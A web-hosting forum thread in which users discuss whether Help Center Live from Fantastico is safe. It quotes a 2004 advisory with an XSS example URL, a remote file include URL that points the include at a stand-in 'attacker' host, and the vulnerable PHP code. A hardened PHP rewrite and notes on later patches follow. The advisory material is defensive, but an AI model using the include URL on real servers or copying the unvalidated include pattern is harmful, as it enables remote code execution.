Vodahost or Navaldesign - Fantastico

  • davidundalicia
    General

    • Mar 2006
    • 6294

    Vodahost or Navaldesign - Fantastico

    Hi, I have just been trying out Help Center Live
    from Fantastico
    and I came across this on the web.... Has this been fixed or should we just dump it?
    I know it's an old report, but I am still wary of continuing with this product!!

    Thanks...

    Critical Vulnerability In Help Center Live
    December 24, 2004

    Vendor : Michael Bird
    URL : http://www.helpcenterlive.com/
    Version : All Versions
    Risk : Multiple Vulnerabilities


    Description:
    Help Center Live is a `Live` help desk system written in PHP using a MySQL database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


    Cross Site Scripting:
    Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

    http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

    This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


    File Include Vulnerability:
    There lies a very dangerous file include vulnerability in Help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file.

    http://path/inc/pipe.php?HCL_path=http://attacker

    All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php



    // inc/pipe.php: with register_globals on, $HCL_path can be set from the query string
    $decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
    include($decodemessage);


    Since we call the pipe.php file directly we can now include a file as long as register_globals is turned on in the php configuration settings. There is a similar issue in skin.php; this could be used in some circumstances to gain access to arbitrary local files and possibly more.



    // inc/skin.php: $HCL_path, $SKIN_name, $SKIN_type and $SKIN_inner all come from the request
    // Get a default inner if no inner is specified
    if (!isset($SKIN_inner)) {
        $SKIN_inner = "default";
    }

    // Get the skins
    $file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
    $handle = fopen($file, "rb");
    $SKIN_output_file = fread($handle, filesize($file));
    fclose($handle);

    // e.g. blah_inner_default.hcl
    $file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
    $handle = fopen($file, "rb");
    $SKIN_output_inner = fread($handle, filesize($file));
    fclose($handle);



    Solution:
    I have contacted the developer, but received no answer. My advice would be for any users running Help Center Live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in the Apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


    Credits:
    James Bercegay of the GulfTech Security Research Team
    Have fun
    Regards..... David

    Step by Step Visual Tutorials for the complete beginner
    Newbies / Beginners Forum
    FREE Membership Login Scripts: - Meta Tags Analyzer
    My Social Networking Site - Free Contact Forms
    Finished your New website!! Now get it noticed Here:
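As an added example (not code from the advisory or from Help Center Live itself), here is what a hardened version of the inc/pipe.php and inc/skin.php pattern quoted above could look like in PHP: the install path is fixed server-side instead of taken from the request, skin components are validated before any path is built, and direct requests to files under inc/ are refused. The HCL_ENTRY constant, the default skin values and the inc/skins/<name>/ layout are assumptions.

```php
<?php
// Added example (not Help Center Live's own code): a hardened version of the
// pipe.php / skin.php pattern quoted above. Assumptions: this file sits in inc/,
// skins live in inc/skins/<name>/, and the real entry script defines HCL_ENTRY
// before including anything under inc/.

// Refuse direct requests to inc/ files: the application-level counterpart of
// the "deny from all" .htaccess the advisory recommends.
if (!defined('HCL_ENTRY')) {
    http_response_code(403);
    exit('Forbidden');
}

// Never take the install path from the request. With register_globals on,
// $HCL_path came straight from ?HCL_path=..., which is the remote include.
// Derive it from the file system instead.
$HCL_path = dirname(__DIR__);

// Skin name/type/inner are attacker-controlled strings used to build a path.
// Allow only a simple token, then confirm the resolved file stays under
// inc/skins/ (realpath() collapses any ../ or symlink tricks).
function hcl_skin_file(string $base, string $name, string $type, ?string $inner = null): string
{
    foreach ([$name, $type, $inner ?? 'default'] as $part) {
        if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $part)) {
            throw new InvalidArgumentException('bad skin component');
        }
    }
    $suffix = $inner === null ? '' : '_inner_' . $inner;
    $file   = $base . '/inc/skins/' . $name . '/' . $type . $suffix . '.hcl';
    $skins  = realpath($base . '/inc/skins');
    $real   = realpath($file);
    if ($skins === false || $real === false
        || strpos($real, $skins . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('skin file not found');
    }
    return $real;
}

// The include now uses a fixed server-side path, never ?HCL_path=http://...
include $HCL_path . '/inc/DecodeMessage.inc';

// Defaults ('default', 'main') are assumed for the example.
$SKIN_name  = $_GET['SKIN_name']  ?? 'default';
$SKIN_type  = $_GET['SKIN_type']  ?? 'main';
$SKIN_inner = $_GET['SKIN_inner'] ?? 'default';
$SKIN_output_file  = file_get_contents(hcl_skin_file($HCL_path, $SKIN_name, $SKIN_type));
$SKIN_output_inner = file_get_contents(hcl_skin_file($HCL_path, $SKIN_name, $SKIN_type, $SKIN_inner));
```

The server-level equivalent the advisory recommends is a .htaccess file inside /inc/ containing `Deny from all` (Apache 2.2 syntax) or `Require all denied` (Apache 2.4), so the web server never serves or executes those files directly.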
  • navaldesign
    General & Forum Moderator

    • Oct 2005
    • 12080

    #2
    Re: Vodahost or Navaldesign - Fantastico

    I have only used Help Center Live approx. a year ago. At that time, issues with the PHP version and settings would not allow correct functioning of the script, so I simply abandoned it. Sorry David, I cannot answer you.
    Navaldesign
    Logger Lite: Low Cost, Customizable, multifeatured Login script
    Instant Download Cart: a Powerful, Customized, in site, DB driven, e-products Cart
    DBTechnosystems.com Forms, Databases, Shopping Carts, Instant Download Carts, Login Systems and more....
    Advanced BlueVoda Form Processor : No coding form processor! Just install and use! Now with built in CAPTCHA!


    • davidundalicia
      General

      • Mar 2006
      • 6294

      #3
      Re: Vodahost or Navaldesign - Fantastico

      Thanks for your quick reply George.

      It seems to work OK, but I am loath to use it if it is still a security risk.

      What about the use of a htaccess file that was mentioned?
      How would this be implemented ?

      Thanks again.


      I will await a reply from *****...
      Have fun
      Regards..... David


      • navaldesign
        General & Forum Moderator

        • Oct 2005
        • 12080

        #4
        Re: Vodahost or Navaldesign - Fantastico

        Found this on the net:

        Description:
        Some vulnerabilities have been reported in Help Center Live, which can be exploited by malicious people to conduct SQL injection attacks.

        Input passed to unspecified parameters in the "osTicket" module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

        Solution:
        Update to version 2.1.0.
        http://sourceforge.net/project/showfiles.php?group_id=93857

        Since Fantastico has v. 2.1.2, I suppose it is OK.



        Security Focus also seems to share the same opinion:

        Navaldesign